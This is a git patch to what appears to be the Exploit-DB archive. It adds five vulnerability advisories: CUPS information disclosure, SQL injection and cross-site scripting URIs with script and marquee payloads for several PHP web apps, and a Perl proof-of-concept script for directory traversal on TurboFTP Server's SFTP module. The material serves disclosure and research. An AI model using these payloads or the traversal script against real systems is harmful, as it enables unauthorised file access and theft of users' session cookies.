From 8041bf2c96c19470ae50588f256cd65649fb74eb Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 25 Jul 2014 04:38:51 +0000
Subject: [PATCH] Updated 07_25_2014

---
 files.csv                         |  5 ++++
 platforms/linux/remote/34152.txt  |  9 +++++++
 platforms/php/webapps/34153.txt   | 15 ++++++++++++
 platforms/php/webapps/34154.txt   |  7 ++++++
 platforms/php/webapps/34155.txt   | 12 ++++++++++
 platforms/windows/remote/34156.pl | 39 +++++++++++++++++++++++++++++++
 6 files changed, 87 insertions(+)
 create mode 100755 platforms/linux/remote/34152.txt
 create mode 100755 platforms/php/webapps/34153.txt
 create mode 100755 platforms/php/webapps/34154.txt
 create mode 100755 platforms/php/webapps/34155.txt
 create mode 100755 platforms/windows/remote/34156.pl

diff --git a/files.csv b/files.csv
index cae38e15a..3b5b27292 100755
--- a/files.csv
+++ b/files.csv
@@ -30756,3 +30756,8 @@ id,file,description,date,author,platform,type,port
 34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0
 34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 'username' Parameter Cross Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0
 34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0
+34152,platforms/linux/remote/34152.txt,"CUPS <= 1.4.2 Web Interface Information Disclosure Vulnerability",2010-06-15,"Luca Carettoni",linux,remote,0
+34153,platforms/php/webapps/34153.txt,"2daybiz Network Community Script SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-16,Sid3^effects,php,webapps,0
+34154,platforms/php/webapps/34154.txt,"Software Index 'signinform.php' Cross-Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0
+34155,platforms/php/webapps/34155.txt,"Ceica-GW 'login.php' Cross Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0
+34156,platforms/windows/remote/34156.pl,"TurboFTP Server <= 1.20.745 Directory Traversal Vulnerability",2010-06-17,leinakesi,windows,remote,0
diff --git a/platforms/linux/remote/34152.txt b/platforms/linux/remote/34152.txt
new file mode 100755
index 000000000..0752fe9c4
--- /dev/null
+++ b/platforms/linux/remote/34152.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40897/info
+
+CUPS is prone to a remote information-disclosure vulnerability. This issue affects the CUPS web interface component.
+
+Remote attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
+
+NOTE: This issue was previously covered in BID 40871 (Apple Mac OS X Prior to 10.6.4 Multiple Security Vulnerabilities), but has been given its own record to better document it. 
+
+http://www.example.com:631/admin?URL=/admin/&OP=% 
\ No newline at end of file
diff --git a/platforms/php/webapps/34153.txt b/platforms/php/webapps/34153.txt
new file mode 100755
index 000000000..4ebf266c2
--- /dev/null
+++ b/platforms/php/webapps/34153.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/40913/info
+
+2daybiz Network Community Script is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+The following example URIs are available:
+
+SQL Injection:
+
+http://www.example.com/products/orkutclone/view_photo.php?page=3&alb=[SQLI]
+
+Cross site Scripting:
+
+http://www.example.com/products/orkutclone/scrapbook.php?id=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/34154.txt b/platforms/php/webapps/34154.txt
new file mode 100755
index 000000000..16773a160
--- /dev/null
+++ b/platforms/php/webapps/34154.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40914/info
+
+Software Index is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/signinform.php?msg=/"><marquee><font%20color=gren%20size=30>indoushka</font></marquee> 
\ No newline at end of file
diff --git a/platforms/php/webapps/34155.txt b/platforms/php/webapps/34155.txt
new file mode 100755
index 000000000..471b3a596
--- /dev/null
+++ b/platforms/php/webapps/34155.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/40917/info
+
+Ceica-GW is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+The following example URIs are available:
+
+http://www.example.com/Ceica/login.php/>"><marquee><font%20color=red%20size=15>XroGuE</font></marquee>
+
+http://www.example.com/Ceica/login.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
+
diff --git a/platforms/windows/remote/34156.pl b/platforms/windows/remote/34156.pl
new file mode 100755
index 000000000..4310ff6dd
--- /dev/null
+++ b/platforms/windows/remote/34156.pl
@@ -0,0 +1,39 @@
+source: http://www.securityfocus.com/bid/40919/info
+
+TurboFTP Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue can allow an attacker to download or upload arbitrary files outside the root directory. This may aid in further attacks.
+
+TurboFTP Server 1.20.745 is vulnerable; prior versions may also be affected. 
+
+#!/usr/bin/perl
+#leinakesi[at]gmail.com
+#turboFTP Server(sftp module) directory traversal vulnerability
+
+use Net::SSH2;
+use Getopt::Std;
+
+
+@FUZZ = ("..\\A\\", "..\\AA");
+getopts('S:P:u:p:', \%opts);
+$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};
+
+if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) ) {
+	print "usage:\n\tperl	test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
+	print "\tperl	test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
+	exit(0);
+}
+
+$ssh2 = Net::SSH2->new();
+$ssh2->connect($server, $port) || die "can not connect the server, please check.\n"; $ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n"; $sftp = $ssh2->sftp();
+
+foreach(@FUZZ)
+{
+	if($m = $sftp->mkdir($_))
+	{
+		print "mkdir success,  $_\n";
+	}
+}
+
+$ssh2->disconnect();
+exit(0);
\ No newline at end of file